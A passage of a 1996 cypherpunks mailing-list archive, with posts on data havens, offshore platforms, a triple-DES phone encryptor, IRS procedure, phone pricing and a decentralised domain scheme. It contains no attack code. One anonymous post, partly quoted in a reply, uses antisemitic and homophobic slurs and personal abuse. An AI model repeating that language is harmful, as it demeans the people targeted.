enough to encompass one unique signature per unique credit transaction
deadline into the indefinite future.  While these protocols are
intriguing, and potential building blocks for a solution,
the institutions using them proposed so far seem to still rely on
a solution to the deposit garnishment problem as discussed above, that 
is the problem of sufficiently disincentivizing the debtor from using 
non-garnishable alternatives while maintaining the privity of
payments to those who are not unsecured debtors (the ability for 
these people to use non-deposit payment methods).

Nick Szabo
szabo@netcom.com
http://www.best.com/~szabo/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 17 Aug 1996 07:57:41 +0800
To: cypherpunks@toad.com
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <Pine.SV4.3.91.960815205619.3926A-100000@larry.infi.net>
Message-ID: <i2NRsD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz <alanh@infi.net> writes:
> Bill, you are welcome to look at a layer of tin foil and give a sigh of 
> relief that you've shielded your gun or your crypto diskette or your 
> private body parts feom someone who knows what they're doing.  Go ahead, 
> chant a mantra too, if it makes you feel better.


If you wrap the aluminium foil around your cranium and the lead foil
around your balls, make sure that the 2 metals don't touch when you
stick your head up your ass.  The resulting spark may cause the
intestinal gas to explode.

Oh dear!! Did I just post a bomb recipe???

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Sat, 17 Aug 1996 07:31:49 +0800
To: cypherpunks@toad.com
Subject: c|net reports UK partial usenet ban
Message-ID: <3214D420.349A@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


UK Metropolitan Police Service bans smutty newsgroups.  See it all
at <http://www.cnet.com>.

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Sat, 17 Aug 1996 10:59:45 +0800
To: cypherpunks@toad.com
Subject: Triple DES Encryption Now Available For Telephone Privacy Protection
Message-ID: <199608162204.PAA19709@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Communication Security Corporation 

For More Information: Eric Blossom (707) 577-0409
Press Contact:  Terri Thatcher (408) 265-7703


 

Triple DES Encryption Now Available For Telephone Privacy Protection 


Santa Rosa, Calif., August 16, 1996, -- The Communication Security
Corporation today announced availability of the CS8191. The first
telephone security device built using uncompromised cryptography,
based on 168--bit key triple DES.
  
Triple DES encryption technology provides an uncompromised level of
security (72 quadrillion times stronger against a brute force attack)
than products based on the US Data Encryption Standard (single DES).
In addition, unlike the government's "Clipper" proposal, the CS8191
does not reveal or "escrow" the encryption keys with third parties.
 
The CS8191 has been designed to work with conventional analog
telephone systems (POTS).  The unit connects between your telephone
and the wall. In 'clear' mode, your telephone continues to work as it
normally does. Pressing the 'go secure' button encrypts
conversations. Communication Security has also incorporated a
leading-edge speech coder.  Voice clarity is undisturbed whether the
system is in 'secure' or 'clear' mode. 

With many of today's standard technologies, anyone can gain access to
our most private of conversations.  The Communication Security
Corporation dedicates their resources to addressing the increasing
need for private, secure voice communication devices. The introduction
of the CS8191 paves the way for research and development for
additional communication security devices for cell phones, modems, fax
machines and computers. For more information on the CS8191, please
contact the Communication Security Corporation, 1275 Fourth St. Suite
194, Santa Rosa, CA 95404, Tel: (707) 577-0409 Fax: (707) 577-0413,
info@comsec.com.



###




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Fri, 16 Aug 1996 20:42:51 +0800
To: cypherpunks@toad.com
Subject: Offshore data havens
Message-ID: <1.5.4.32.19960816093326.003053a0@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 17:30 15/08/96 -0700, Timothy C. May wrote:

>As with offshore buoys, how long do you think such an entity would last?
>
>You mentioned Greepeace...don't forget that the French intelligence
>apparatus sunks a Greenpeace ship in a New Zealand harbor. Don't forget the
>way the U.S. mined Managua's harbor. And so on.

>Think of how any of these schemes are vulnerable to a cheap torpedo,
>"anonymously mailed" from several miles away.

There is another aspect to this: the French sinking of the
Greenpeace ship in New Zealand was arguably the best thing that
ever happened to the organisation. They certainly got lots of
publicity, new members, money... 

On the Internet, news spreads fast, so the cost of such an attack
in terms of damage to reputation would be high. Of course, if the
torpedo were truly anonymous, we wouldn't know who to blame. All
criminals attempt to commit crimes "anonymously", yet many do get caught.

>Oil rigs, buoys, pirate ships....these are all examples of hopelessly
>insecure systems. I could say more, but what's the point?

OK, suppose someone were to bury the server deep in a valley or
shaft under the water, with only an antenna sticking out (and a
supply of spare antennae that could be automatically deployed if
one got knocked out)? And, with Moore's law in operation, one
might even be able to deploy large numbers of such servers that
mirrored each other at reasonable cost. 

Once connectivity is via LEO satellites, unless those beasts are
equipped for the purpose, I suspect locating the source of
transmission will not be all that easy.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sat, 17 Aug 1996 05:07:28 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: Anguilla - A DataHaven?
In-Reply-To: <Pine.SUN.3.94.960816033853.22381B-100000@infinity.c2.net>
Message-ID: <Pine.SUN.3.95.960816155911.26920A-100000@netcom16>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 16 Aug 1996, William Knowles wrote:

> Where is Redonda on the map, I'm too lazy to look it up, 

	It is a dependancy of Anguilla.   

	The only permanent inhabitants are birds.  

	I don't remember if Redonda, or Anguilla's other
	dependency is the one that is under water at high tide.
	<< That little problem hasn't prevented Anguilla from
	issueing stamps, and currency for both of those dependencies.  >>

        xan

        jonathon
        grafolog@netcom.com



		VapourWare is like the Tao,
		Looked for it cannot be found,
		Reached for it cannot be touched,
		Waited for not even FedX can deliver;
		            <Paid for it will not be refunded>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Carlos L. Mariscal" <al177820@campus.gda.itesm.mx>
Date: Sat, 17 Aug 1996 10:38:07 +0800
To: cypherpunks@toad.com
Subject: Unix passwd-cracker online?
Message-ID: <Pine.A32.3.91.960816161112.53362A-100000@campus.gda.itesm.mx>
MIME-Version: 1.0
Content-Type: text/plain



	Dear C'punks: (this is not Sandy, jeje)

	Just got to know from a very close friend of mine, and Unix 
administrator at  very famous university in Mexico, that more than one 
person has obtained a specific password by entering the desired 
adresses'passord on a submnit form in a Web page.

	As far as my knowledges on Unix and experience obtained from a 
couple of hackers (the 'ethic' kind, if they can be called so), this 
would imply pretty much of a piece of technical work, and probably, the 
presence of human support to get such a system working.


	Actually, i dont have the adress, and it sems to me that we'll 
never have it if there really is such, but this came to my mind when i read 
the posts  on the plate-numbers-in-Oregon polemica. I would appreciate 
any kind of opinions on this specific topic, not the ones saying> Well, 
if there's  ftp acces to /etc/passwd, and this is not shadowed, bla, bla, 
bla. I mean real opinions...

    __       
    ||     
   ====         'If you can dream of it
   |  |__       then you can manage it'
   |  |-.\     
   |__|  \\         clopez@nayar.uan.mx
    ||   ||         
  ======__|     
 ________||__   
/____________\   Carlos L. Mariscal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 17 Aug 1996 07:11:48 +0800
To: "Douglas R. Floyd" <dfloyd@io.com>
Subject: Re: Jurisdictionless Distributed Data Havens
In-Reply-To: <199608151452.JAA02130@xanadu.io.com>
Message-ID: <Pine.SUN.3.94.960816162638.12459A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



RE: Your distributed Data Mockup.

If this ever gets to the point where it might be implemented on a
commercial basis, please let me know.

It may mesh well with a project I am working on and may be profitable for
you.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 17 Aug 1996 07:38:33 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Fw: Re: Free Pronto Secure Offer
In-Reply-To: <Pine.LNX.3.93.960815195125.154A-100000@smoke.suba.com>
Message-ID: <Pine.SUN.3.94.960816162838.12459C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Aug 1996, snow wrote:

> On Thu, 15 Aug 1996, Black Unicorn wrote:
> > you to make their comments public.  That's called an endorsement, and, by
> > the way, people are usually paid for them.  Sometimes in the millions.
> > Think Michael Jordan is getting a deal when you use his name to promote
> > your product and then give him a $99.00 piece of software (which is
> > effectively worth the amount of time it takes to write a few kiss ass
> > paragraphs on the software, not $99.00)?
> > 
> 
>      The time it takes M. Jordon to write a couple of paragraphs would 
> be worth at least $99.  

If MJ wanted a copy he need only tell someone else to write the
paragraphs and take the copy from that someone else.

The point is that the "prize" is worth only that which it takes to obtain
it.  In this case, a bum could write a review (his time is worth nearly
nothing in op. cost) and turn it over to whomever.

> 
> 
> Petro, Christopher C.
> petro@suba.com <prefered for any non-list stuff>
> snow@smoke.suba.com
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 17 Aug 1996 07:31:23 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Floating DataHaven
In-Reply-To: <Pine.LNX.3.91.960815194218.16207H-100000@offshore>
Message-ID: <Pine.SUN.3.94.960816163002.12459D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Aug 1996, Vincent Cate wrote:

> 
> William Knowles <erehwon@c2.org>
> > 
> > Something that I thought would make an excellent data haven would
> > be older offshore oil platforms,
> > [...]
> > You have to wonder how cheap these could sell 
> > for just to get them off the oil companies hands? 
> 
> A floating DataHaven is probably the way to get the ultimate in 
> freedom.  

Disagree strongly.  Unless you were willing to arm the platfom (a
proposition which aproaches the feasibility of say SPECTER in James Bond
films) you are much more vulnerable.

> There is someone on Anguilla that bought a used floating oil platform for
> $1 million.  It is big enough for 200 people to live on.  It is not here,
> so I have not seen it. 
> 
> There is someone else here who says that there are some really old ones
> that you can get just for hauling them away. Some countries will not let
> owners just sink them. 
> 
> You can get Internet via radio links for reasonable prices.  And via
> satellite for almost affordable prices.  When Bill Gates 900 satellites
> get up there it should be very affordable. 
> 
>   --  Vince
> 
> -----------------------------------------------------------------------
> Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
> Offshore Information Services         http://www.offshore.com.ai/
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 17 Aug 1996 10:39:19 +0800
To: Wilhelm Schmidt <an572010@anon.penet.fi>
Subject: Re: The Transparency Of Cyber-Nitrate
In-Reply-To: <9608161725.AA07803@anon.penet.fi>
Message-ID: <Pine.GUL.3.95.960816162513.16837E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[From: Rich Graves <rich@c2.org>]
[To: The honourable Vyshinsky <an572010@anon.penet.fi>]
[Cc: cypherpunks@toad.com]

On Fri, 16 Aug 1996, Skipper's Hammer <qut@netcom.com> wrote:

> Liar.  Either post your entire copy to alt.revisionism or prove yourself 
> a lying capitali$t bastard who's jealous about Zuendel because you are a 
> J$wish preppie homo$exual righti$(t) ri(c)h pig.

OK. I'm a lying capitali$t bastard who's jealous about Zuendel because I am
a J$wish preppie homo$exual righti$(t) ri(c)h pig. You can quote me on that.

Stop pretending to be Detweiler. You're nowhere near as interesting. Welcome
to my cypherpunks killfile.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMhUFJJNcNyVVy0jxAQE5NAH/ZRks2CBTqWpPrJiHnBDa12QSE0qXDn8T
HqrFdgzUPg+9TfkI6e5FlQOPTQrYZKv6OQVdL4LpmfvE9+9P8VzDTQ==
=fDi1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 17 Aug 1996 07:54:05 +0800
To: Robin Powell <rpowell@algorithmics.com>
Subject: Re: Burden of proof
In-Reply-To: <96Aug15.132311edt.20486@janus.algorithmics.com>
Message-ID: <Pine.SV4.3.91.960816163232.25274F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


>     >> In the USA, we have a system that ensures that the burden of proof is on
>     >> the accuser.
> 
>     > Which explains why in the  U.S. the tax authorities take the money first
>     > and then require the citizen to be the "accuser" in Tax Court, pleading to
>     > get his seized assets back.

   Tim, bad as the Congress is, it did _not_ give the arbitrary powers 
you describe to the IRS. It's clear that you have not studied the 
Tax Code paragraph-by-paragraph, nor are you keeping up with Tax Court and 
District Court rulings. I have (in selected sections) and I do.

The IRS does NOT have the power to "just seize"  things. There is an
Administrative sequence that they are required to follow, involving
notices to the taxpayer, opportunities to gain abatements, etc.  The
courts are unanimous on holding the IRS to these strict requirements. 

The IRS is without a doubt, the most abuse-o-genic TLA we are cursed 
with. It is not unstoppable. I have won against them a few times, acting 
_pro se_.

The IRS is very dependant upon its *image* of being not-worth-fighting. 
They cultivate this, very carefully. It is purely an image.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 17 Aug 1996 07:52:00 +0800
To: Scottauge@aol.com
Subject: Re: Burden of proof
In-Reply-To: <960815192512_457514748@emout07.mail.aol.com>
Message-ID: <Pine.SV4.3.91.960816164532.25274G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> > This relates to something I have been wondering about:  If one could
> >  get one's company to pay one in electronic cash, what is to stop one
> >  from piling the coins in a Datahaven somewhere (assuming one existed



   The income "tax" is not a tax.... it is an excise. There is a crucial 
difference. Taxes are assessed against *things*, excises are assessed 
against events.

If you don't pay a property tax, the assessor forcloses agains the thing. 
If the thing changes hands during the tax year, the tax due is pro-rated 
against both parties interest in the item.

An excise is assessed against an event. For example, the constructive 
recipt of income. As in, when the employer disburses it to your 
constructive (*legal definition*) control.

That's why you cannot say to the IRS, "Sorry, I already spent it all. You 
can't assesse me, I don't have it".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 17 Aug 1996 07:40:59 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <ae392bc40c021004cb4a@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960816165513.25274H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


TIm, a layer of tin foil is not the same as a professionally installed 
and maintained Faraday cage.

I can envision circulating currents on the tinfoil. Ie, ground loop type 
of situation.

All imaging is depenmdant upon the target having some radiating 
characteristic. If the gun shields a gun-shaped peice of the body from 
radiating in millimeter waves, you can build a gun detector.

If you're sure that a firearm always looks like a gun, that is....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 17 Aug 1996 11:54:05 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: Protecting floating datahavens?
Message-ID: <199608170000.RAA08637@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:36 AM 8/16/96 -0700, William Knowles <erehwon@c2.org> wrote:
>Now this is a completely doable concept, and likely more realistic
>than the Oceania project, 

Oceania was perfectly doable, if you're cynical about its objectives :-)
It did great T-Shirts, got people to pay for newsletters, and even
got enough donations to get an architect to build a cool model
while keeping its head promoters in the Floating-Country-Promotion business.

One of the things that inspired people to believe in them is that there's
a floating hotel that used to hang out in the South Pacific, though it
may be in the Caribbean by now, which cost something like $20M for
a 200-room hotel.  The Oceania folks designed a billion-dollar
exravaganza that would be far more affordable per resident,
but it's a much bigger, and unrealistic, risk.   

The basic risks with such things are:
1) Getting governments to agree to leave you alone.  If you're doing a
        high-visibility call-yourself-a-country approach,
        and your country doesn't include Real Above-Sea-Level Dirt,
        you're really gambling on whether the UN and big countries
        will recognize you.  If you're just calling yourself a
        big houseboat, and don't upset the US Drug-Confiscation Pirates
        too much, you don't need to care as much about this one.
2) Getting governments and other pirates to actually leave you alone.
        The Republic of Minerva, back in the 70s, had real dirt
        (or at least coral reefs, and met the UN 1-foot-above-high-tide
        standards) near Fiji, but the Kingdom of Tonga invaded them
        after about six months.  Calling yourself a country
        is one way to attract adverse attention, but also has
        some protection.  Allowing people to use politically
        incorrect substances is another, and if you're allowing
        politically incorrect data, you're inviting governments
        to plant child-terrorist narco-pornography to justify
        "police actions" against you.
3) Making it work financially, for the proprietors and tenants/co-owners.
        Free-market enthusiasts generally assume this is doable,
        if the upfront/interest costs of the place aren't really prohibitive.
4) Convincing investors that you're safe enough on 1) and 2)
        that they're willing to risk the money to build/buy a
        country and hope it stays independent long enough to make a profit.
        With Oceania, it would have made much more sense to raise $25M,
        which is doable, to buy the floating hotel and declare independence.
        (Either one really rich guy, or a hundred yuppies of the 
        type that buy quarter-million-dollar condos in Maui will do.)
        Raising a billion dollars against that risk isn't.
        Raising a million for an oil rig, if they're that cheap,
        is also doable, though the politics for something
        anchored are different from a ship.
        
There's also a Laissez-Faire City project, which proposes to lease a
10-mile-square chunk of land to rent from any cooperative third-world
government for 50 years or so with a deal of local autonomy.
It's much less threatening to the Old World Order than calling yourself
a country, and you've got a government which is making money by
leaving you alone that at least discourages the most likely invaders
(itself, and the US) without having to provide much national defense.
Who knows, maybe they'll actually do something, and rent a chunk of
Costa Rica or Somaliland or whatever.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 17 Aug 1996 07:48:28 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: implausible defenses & tax havens
In-Reply-To: <2.2.32.19960816060630.006dc138@mail.io.com>
Message-ID: <Pine.SV4.3.91.960816170634.25274I-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


<< Greg Broiles text elided >>

This is called the "smell test" by old tax hands.....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 17 Aug 1996 09:18:42 +0800
To: ichudov@algebra.com
Subject: Re: implausible defenses & tax havens
In-Reply-To: <199608160913.EAA18988@manifold.algebra.com>
Message-ID: <Pine.SV4.3.91.960816171200.25274J-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Suppose that a computer consultant Mr. X knows cryptography so well 
> that his clients are willing to pay him $100/hr. Mr. X could conspire
> with his client that he receives only $40/hr in taxable income, and the
> rest he gets in form of digital cash.
> 
> If X lives sufficiently modestly, the IRS will be having hard times

    The paying company has a tax return of it's own, which will be used 
to show how much was paid (actually or constructively) to Mr X.

The IRS doesn't usually get it's indictments from circumstantial 
evidence. It gets them from the pissed off underlings who see Joe Cool 
Mr X getting away with shit they can't.

How many secretaries, payroll clerks, human-relations staffers, etc, will 
be seeing the chain of paperwork that is generated by the "arrangement"?  
They know how normal payroll is handled. Some tiny percentage of these 
sheep are alert enough to put two and two together.... and it's all 
downhill from there.

Let us recall how the (apparent) (alleged) UNabomber was identified....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 17 Aug 1996 11:48:14 +0800
To: jya@pipeline.com (John Young)
Subject: Re: FCC_ups
Message-ID: <199608170022.RAA29008@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:31 AM 8/17/96 +0000, Vipul Ved Prakash wrote:
>>    8-10-96. WaPo: 
>>    "Phone Service Via the Internet May Slash Rates." 

[deleted]

>This kind of report is often confusing and more often misleading.
>Most of the internet still runs on "the infrastructure provided by 
>the giants of the telecommunications industry, who according to the report 
>would cease to exist after some time". 
>
>Bigbells and Babybells provide cheap [flat rate local calls] and 
>expensive long-distance calls. They make most of their money on the
>later. This money goes into development and maintainance of their
>infrastructure. Once they loose these profits 1. They won't be able
>to provide cheap local-calls and/or 2. They would go bankrupt and shut the
>entire network which is used by many to connect to the internet.
>
>This is complex problem and the only solution I see to it is a
>different pricing policy. [Prolly a differential pricing system might fit
>the scenario but I don't have much idea about that] 
>
>First flat rates would have to go out.
>If Alice uses her phone for 5 hrs in month and pay _x_ dollars and Bob uses
>his for 100 hrs and pays _x_ dollars, then Alice is subsidising Bob, which
>is not really ethical. Everyone should pay for the amount of bandwith 
>one is using.  

I'm afraid you're promoting what I consider a rather old (and, now, odd) way 
to look at it.  Unlike old mechanical telephone switches, the new hardware 
does not "wear out" and thus a person who uses it more doesn't cost the 
phoneco any more bucks.  If that's the case, I don't see the logic in 
charging a person more for greater use.  

The only remaining argument for charging for use is that if everybody were 
to start using the telephone 3 hours per day, it is possible the switches 
would have to be upgraded to allow more simultaneous connects.  However, 
this is unlikely to happen, and as I understand it electronic switches have 
plenty of capacity for current needs and substantially more.

There's a good reason that Internet-connect traffic won't substantially 
impact telephone network limits:  My impression from my local ISP is that 
peak times for him are between 9pm and 11 pm.  This is a time which 
relatively small numbers of voice calls are made, certainly compared with 
the peak times during the day for business calling.  Because telephone 
networks are designed to meet peak usage needs, there is plenty of unused 
capacity at other times.  This is connect capacity that would otherwise be 
"wasted."

In other words, telephone switch capacity is starting to be more efficiently 
used, looked at on a 24-hour basis.  This costs the phoneco not a penny 
more, so they have no reason to charge more for it.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Sat, 17 Aug 1996 08:23:59 +0800
To: jcr@idiom.com
Subject: Re: Lunch with Bill, anyone?
Message-ID: <199608162121.RAA11475@booz.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


I would rather bee with Bella Abzug ( probably spelled wrong )

At 05:31 AM 8/16/96 -0700,John C. Randolph wrote:

>Meeting Bill Gates would be every bit as exciting as meeting Tony 
>Orlando.  Or maybe Wayne Newton.

I don't mind the sarcasm regarding Gates, but watch what you say about
 Wayne
Newton!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an572010@anon.penet.fi (The honourable Vyshinsky)
Date: Sat, 17 Aug 1996 07:18:38 +0800
To: cypherpunks@toad.com
Subject: Re: The Transparency Of Cyber-Nitrate
In-Reply-To: <839785435snz@abaron.demon.co.uk>
Message-ID: <9608161725.AA07803@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Rush Graves <llurch@stanford.edu> writes:

>> yawen@enter.net (Yale F. Edeiken) writes:
>> >>   Alexander Baron <A_Baron@abaron.demon.co.uk> writes:
>> >>  In article <4ui6qj$bk5@news.enter.net> yawen@enter.net "Yale F. Edeiken" 
>> >writes:
>> >  
>> >>  > texts on Hitler.  You demonstrate another typical denier failing as
>> >>  > well. One of your 
>> >>  > friends (according to your story) goofed.  Insttead of blaming him, you
>> >>  > called someone who correctly pointed you to a valid source of
>> >>  > information a nasty name.
>> >>  >         Where is your apology, Lyin' Al?
>> >
>> >>  You really are one unpleasant person, aren't you Yale? You must meet an 
>> >>  awful lot of "anti-Semites".
>> >
>> >	Actually I meet very few outside of alt.revisionism.
>> 
>> "Me too." I hardly believed these dinosaurs still existed a year ago. I
>> think it's healthy to keep in mind just how unrepresentative the
>> Nazihuggers are. 
>> 
>> The ZGram list and the rec.music.white-power vote are pretty good

Liar.  You know very well the rec.music.white-power vote was falsified.

>> indicators that of the millions of people on the Internet, only a few
>> hundred are seriously into this garbage. 

Liar.  You know very well that Stormfront-L is not representative of net 
racismo.  It appears unusually intelligent vs. usenet racists is because 
of Don Black's moderation.  There aren't constant interruptions by Andrew 
Mathis, Mike Beebe, ara, scoop, sexy Jeanne Kapowski, etc., threatening 
to rape, mutilate, poison and murder racists, thanks to Mr. Black.  You 
also know very well that numbers of mailing list subscribers do not 
translate to active interest in a newsgroup.  How popular would 
comp.cypherpunks be if it was created and propagated?  FAR more popular 
than anyone would expect from a mere 1,000 or so current subscribers.  In 
fact, this is your's and tcmay, Sameer, shamrock, etc., duty to write a 
RFD and CFV for an UNMODERATED comp.cypherpunks newsgroup.  On second 
thought, you SHOULDN'T participate because you censor by moderation 
yourself as a power trip.  You know, in hindsight, I think I hurt the 
r.m.w-p effort more than helped, I only posted to usenet about it and 
avoided mail.  I shouldn't have respected cypherpunks enough to refuse to 
follow your practice of trolling against racists on the mailing list, I 
should have confined my campaign to cypherpunks.  Another example, does 
the 40 or so subscribers to coder-punks indicate there is very little 
interest in coding for crypto-@nonymity?!??????

>> I spent about an hour today reading Ingrid/Zundel's 93-page treatise on
>> "Background and Detailed Chronology of Ernst Zundel Persecution," which
>> Ingrid was so kind as to send me (OK, she didn't exactly know it was
>> me...). Near the end of the subsection called "The First Trial --
>> 'Spreading False News," I found a very encouraging couple of paragraphs,
>> which I'll quote here.

Liar.  Either post your entire copy to alt.revisionism or prove yourself 
a lying capitali$t bastard who's jealous about Zuendel because you are a 
J$wish preppie homo$exual righti$(t) ri(c)h pig.

>>       A year after Zuendel's trial a 200 page book entitled "Hate on
>>    Trial: The Zuendel Affair, the Media and Public Opinion in Canada" was
>>    published.... 
>> 
>>       "Hate on Trial" sought to measure through scientific polling data
>>    the effect of the massive coverage of the Zuendel trial on public
>>    opinion in Canada concerning Jews, the Holocaust and Germans. "The
>>    central motivation for our research project," wrote the authors, "was
>>    to find out what truly happened in the mind of the Canadian public. Did
>>    support for the Nazi perspective grow as a result of the trial and as a
>>    result of the media coverage of the trial? Did more Canadians become
>>    prejudiced against Jews as a result of the affair? How were attitudes
>>    towards Germans affected? What specifc roles did television and the
>>    press have in shaping Canadian attitudes? Were the media as harmful as
>>    many people, including journalists, feared?" (p. 31)
>> 
>>       The researchers found that news coverage of the trial:
>> 
>>     "...did more harm to the image of Germans than of Jews... Two thirds
>>     of Canadians did not change their opinions as a result of the
>>     extensive coverage of Mr. Zuendel's sensational seven week trial, but
>>     of those who did, the vast majority became less sympathetic to Germans
>>     and more sympathetic to Jews, the authors conclude... [W]hile
>>     television had a strong emotional impact, the effect was entirely
>>     opposite to what many people feared. 'People who were heavy, heavy
>>     television viewers said they became more sympathetic to Jews,'
>>     Professor Conrad Winn of Carleton University said." (Globe & Mail,
>>     March 22, 1986)
>> 
>> False "German v. Jew" conflict aside (in fact most Germans repudiate Mr. 
>> Zuendel's propaganda), I find it very encouraging that Zuendel largely
>> failed to troll up support. The public isn't as stupid as some people
>> think. 

Prove it, liar.  I can prove the opposite with just these examples: 
racist terrorism, Oklahoma City, Vipers, J$ws, Microsoft, Holocaust, 
capitali$m, flying saucers, penny stocks, etc.

>> The full citation of the referenced work is:
>> 
>> Weimann, Gabriel and Conrad Winn. Hate on Trial: the Zundel affair: the
>>   media and public opinion in Canada. New York: Mosaic Press, 1986.
>> 
>> I'll probably go pick it up at the Law Library to see how faithful
>> Ingrid/Zundel's review of the book is. I don't see why they'd lie about
>> this particular bit of information.

Why do you pretend to be Ingrid in your latest post?  Are you jealous of 
the pretty woman you'll never have because of your difficulties with 
those sort of things?

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sat, 17 Aug 1996 08:01:44 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: ISPs in cyberspace - how?
In-Reply-To: <Pine.SUN.3.94.960816111931.24799B-100000@polaris>
Message-ID: <Pine.LNX.3.91.960816170922.18711A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn:
> The trick is to get the ISP to exist in cyberspace, or ever will it be
> subject to the whim of the local authority.
> 
> This is a key and very important distinction.

I agree.   I think this would be a good focus for cypherpunks to think
about for awhile.  So let me try to start something.

A first step is just having a domain name (foo.com) that you can move to
different virtual hosts.  This is still vulnerable at either the Internic
or at your nameservers.  Could also be a subdomain of some provider (say
foo.c2.org), but then c2.org gets the pressure. So far I don't know of
reporters going after the Internic for allowing a name (like foo.com).  So
this could be safe for awhile.  But it is not totally secure. 

A better method would be to make our own cypherpunk top level domain (I
think Sameer talked about this some time back).  With this people would
either have to setup their nameserver to use one of the cypherpunk
nameservers or get the IP address from some other method (a web page,
ftpable file, newsgroup, searching AltaVista, or a web page with a cgi
script to do the lookup on a machine).  But with this there would be no
easy way to cut off a name, and the ISP could always relocate if their
physical location were cut off (i.e. the IP address had to change). 

Then it is just an issue of coordinating this top level domain.  Say a
public key for each new subdomain and updates are done by sending a pgp
signed message to each of the servers.  With this type of design you could
have hundreds or thousands of servers that each were updated
independently.  To shut it down would take shutting down a lot of
nameservers. 

What do people think?  

   --  Vince

-----------------------------------------------------------------------
